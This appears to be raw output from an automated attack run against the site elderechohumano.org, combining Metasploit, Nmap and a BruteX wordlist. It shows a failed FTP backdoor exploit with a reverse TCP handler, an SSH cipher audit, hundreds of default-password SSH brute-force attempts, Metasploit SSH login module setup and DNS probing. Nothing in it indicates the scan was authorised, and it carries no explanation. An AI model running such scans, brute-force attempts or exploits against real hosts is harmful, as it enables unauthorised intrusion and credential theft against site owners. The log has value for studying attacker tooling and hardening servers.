- [*] elderechohumano.org:21 - USER: 550 SSL/TLS required on the control channel
- [-] elderechohumano.org:21 - This server did not respond as expected: 550 SSL/TLS required on the control channel
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.211.1.5:4444
- [*] elderechohumano.org:21 - Sending Backdoor Command
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 opened... running tests...
- # general
- (gen) banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10
- (gen) software: OpenSSH 6.6.1p1
- (gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-ripemd160-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-96-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) hmac-md5-96-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 6.6.1)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-md5-etm@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1-96-etm@openssh.com -- mac algorithm to remove
- (rec) -hmac-ripemd160-etm@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5-96-etm@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -umac-128@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
- (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:20 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- Nmap scan report for elderechohumano.org (51.255.33.229)
- Host is up (0.43s latency).
- rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 233 guesses in 181 seconds, average tps: 1.5
- | ssh-hostkey:
- | 1024 28:53:f6:e0:cd:8d:b0:ba:bf:c5:3f:ed:97:ff:c7:52 (DSA)
- | 2048 4f:c7:a5:bc:88:8a:ab:28:35:a1:c2:07:24:51:48:e5 (RSA)
- |_ 256 48:0a:9c:f0:85:b3:8b:ae:37:21:26:d5:d4:f6:5c:c6 (ECDSA)
- | ssh-publickey-acceptance:
- |_ Accepted Public Keys: No public keys accepted
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP|general purpose
- Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 474.72 ms 229.ip-51-255-33.eu (51.255.33.229)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 199.28 seconds
- _---------.
- .' ####### ;."
- .---,. ;@ @@`; .---,..
- ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
- '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
- `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
- "--'.@@@ -.@ @ ,'- .'--"
- ".@' ; @ @ `. ;'
- |@@@@ @@@ @ .
- ' @@@ @@ @@ ,
- `.@@@@ @@ .
- ',@@ @ ; _____________
- ( 3 C ) /|___ / Metasploit! \
- ;@'. __*__,." \|--- \_____________/
- '(.,...."/
- =[ metasploit v4.16.57-dev ]
- + -- --=[ 1767 exploits - 1007 auxiliary - 307 post ]
- + -- --=[ 537 payloads - 41 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- USER_FILE => /BruteX/wordlists/simple-users.txt
- RHOSTS => elderechohumano.org
- [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => elderechohumano.org
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
- [+] 51.255.33.229:22 - SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10 ( service.version=6.6.1p1 openssh.comment=Ubuntu-2ubuntu2.10 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=14.04 service.protocol=ssh fingerprint_db=ssh.banner )
- [*] elderechohumano.org:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:24 EDT
- Nmap scan report for elderechohumano.org (51.255.33.229)
- Host is up (0.42s latency).
- rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
- PORT STATE SERVICE VERSION
- 53/tcp open domain (unknown banner: none)
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: none
- | fingerprint-strings:
- | DNSVersionBindReqTCP:
- | version
- | bind
- |_ none
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port53-TCP:V=7.70%I=7%D=5/23%Time=5B050922%P=x86_64-pc-linux-gnu%r(DNSV
- SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
- SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
- SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP|general purpose
- Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 3.X|2.6.X (93%)
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
